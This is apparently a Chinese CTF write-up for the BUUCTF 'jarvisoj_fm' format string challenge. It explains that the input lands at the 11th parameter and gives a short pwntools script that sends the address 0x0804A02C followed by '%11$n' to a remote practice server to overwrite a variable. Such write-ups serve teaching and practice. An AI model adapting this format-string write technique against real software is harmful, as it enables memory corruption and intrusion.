当前位置: 首页 > news >正文

buu-jarvisoj_fm-好久不见52

格式化字符串漏洞题

x等于4x等于4​​​​​​​x等于4​​​​​​​x等于4

可以知道是第11个参数,%11$ 定位到这个位置,然后%n往这个位置写入4

1.先用pwndbg调试得到偏移量
2.查看获取x的地址
3.构造ROP链,发送连接

from pwn import *

# 连接到远程服务器
p = remote("node5.buuoj.cn", 26985)

# 目标地址
addr = 0x0804A02C

# 构造payload
# p32将地址转换为4字节小端格式
# b'%11$n'确保字符串是字节类型
payload = p32(addr) + b'%11$n'

# 发送payload
p.sendline(payload)

# 进入交互模式
p.interactive()

相关文章:

  • Docker-MySQL安装-命令解读-常见命令-数据卷挂载-本地目录挂载-自定义镜像-网络-前端部署-DockerCompose
  • 最接近的三数之和
  • Xss复现
  • Elasticsearch 之 ElasticsearchRestTemplate 聚合查询
  • 2025年CNG 汽车加气站操作工题目分享
  • 用否定干掉无效流量:DeepBI如何精准提升亚马逊广告效果
  • JDK版本与Class版本的对应关系对照表
  • 121买卖股票的最佳时机解题记录
  • 数据不互通、审批慢?如何实现多系统智能协同
  • Java实现 自主学习一套身份证识别(识别营业执照信息和语音识别接口)
  • DeepSeek集成:如何将DeepSeek修炼成‘国殇剑舞‘
  • 数据库后续
  • python实现登录页面图形验证码
  • Pydantic字段元数据指南:从基础到企业级文档增强
  • 【软考备考】系统架构设计论文完整范文示例
  • iOS自定义collection view的page size(width/height)分页效果
  • 横扫SQL面试——事件流处理(峰值统计)问题
  • 8.3MW屋顶光伏+光储协同:上海汽车变速器低碳工厂的能源革命-安科瑞黄安南
  • 飞桨PP系列新成员PP-DocLayout开源,版面检测加速大模型数据构建,超百页文档图像一秒搞定
  • 解决 “Cannot read SQL script from class path resource [sql/XX.sql]“ 错误
  • 安徽凤阳县明中都鼓楼楼宇顶部瓦片部分脱落,无人员伤亡
  • 揭秘拜登退选内幕新书引争议,“垃圾信息在四处传播”?
  • 习近平:坚持科学决策民主决策依法决策,高质量完成“十五五”规划编制工作
  • 聘期三年已至:37岁香港青年叶家麟卸任三亚市旅游发展局局长
  • 建筑瞭望|从黄浦江畔趸船改造看航运设施的升级与利用
  • 美国务卿与以色列总理通话,讨论加沙局势